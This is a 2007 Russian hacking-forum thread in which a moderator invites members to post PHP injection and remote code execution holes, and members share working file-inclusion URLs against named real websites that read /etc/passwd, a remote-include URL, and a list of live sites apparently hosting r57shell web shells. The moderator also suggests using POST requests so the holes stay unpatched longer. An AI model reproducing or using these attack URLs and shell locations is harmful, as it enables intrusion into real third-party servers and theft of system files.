PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

    +Постим только:
    +php/perl/jsp иньекции.
    +Исполнение произвольного кода.
    +Исполнение произвольных команд.

    +Статья php injection(
    http://forum.antichat.ru/thread12123.html).

    +За флуд буду строго наказывать.
    +Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).

    При удаленных инклудах
    Постим так:
     
    #1 Joker-jar, 20 Apr 2007
    Last edited by a moderator: 22 Jul 2011
    IGL, NOmeR1 and Talisman like this.
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

    +Постим только:
    +php/perl/jsp иньекции.
    +Исполнение произвольного кода.
    +Исполнение произвольных команд.

    +Статья php injection(
    http://forum.antichat.ru/thread12123.html).

    +За флуд буду строго наказывать.
    +Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).

    При удаленных инклудах
    Постим так:
     
    #2 guest3297, 20 Apr 2007
    Last edited: 23 Apr 2007
    1 person likes this.
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    запостю, только чёт я не уверен что будет такая же активность.
     
    1 person likes this.
  4. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://primotechnology.com/index.php?art=../../../../../etc/passwd
    уже 210 просомтоов топика..
     
    2 people like this.
  5. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Порадовало :D
     
    1 person likes this.
  6. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    - сохраняем как passwd.txt и открываем
     
    1 person likes this.
  7. s1mt

    s1mt Member

    Joined:
    18 Apr 2007
    Messages:
    15
    Likes Received:
    6
    Reputations:
    0
    http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
     
    1 person likes this.
  8. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    Удаленный инклуд:

    Code:
    http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
    Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":

    Code:
    http://www.aodaitimhue.com/nhacrock/info.php
    http://www.shp-berlin.de/en/expertise.php
    http://www.auschwitzdanceparty.org/conf/r57.php
    http://live8x.com/images/kol.php
    http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
    http://www.huyhoangkontum.org/h.php
    http://www.sniperfoxselacome.com/index.php
    http://www.hostingstar.us/rapid/ab.php
    http://www.aongtr.ro/g.php
    http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php
     
  9. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    И просматриваем в исходном тексте =)
     
  10. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    - сохраняем как passwd.txt и открываем
     
    1 person likes this.
  11. s1mt

    s1mt Member

    Joined:
    18 Apr 2007
    Messages:
    15
    Likes Received:
    6
    Reputations:
    0
    http://www.paru.cas.cz/index.php?file=../../../../../etc/passwd
     
  12. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    сохраняем как passwd.txt и открываем
     
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    сохраняем как passwd.txt и открываем
     
    1 person likes this.
  14. xaxxer

    xaxxer New Member

    Joined:
    18 Nov 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    http://www.njff.no/index.php?file=../../../../../etc/passwd
     
    1 person likes this.
  15. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    :D
     
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    0o
     
    1 person likes this.
  17. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Так Хорошо одобряю пока данную активность.

    http://robo-host.ru/bill/index.php?lang=../../../../../../../../../../../../../etc/passwd%00

     
    #17 guest3297, 21 Apr 2007
    Last edited: 21 Apr 2007
    2 people like this.
  18. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Code:
    http://www.tinform.ru/price.php?file=../../../../../etc/passwd
    хотел у них акустику прикупить, передумал =)
     
    2 people like this.
  19. s1mt

    s1mt Member

    Joined:
    18 Apr 2007
    Messages:
    15
    Likes Received:
    6
    Reputations:
    0
    http://inet-sell.de/shop/catalog/elmar_start.php?file=../../../../../../../../etc/passwd
     
  20. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Держите :
    Скоро ещё будет :) :)
     
    1 person likes this.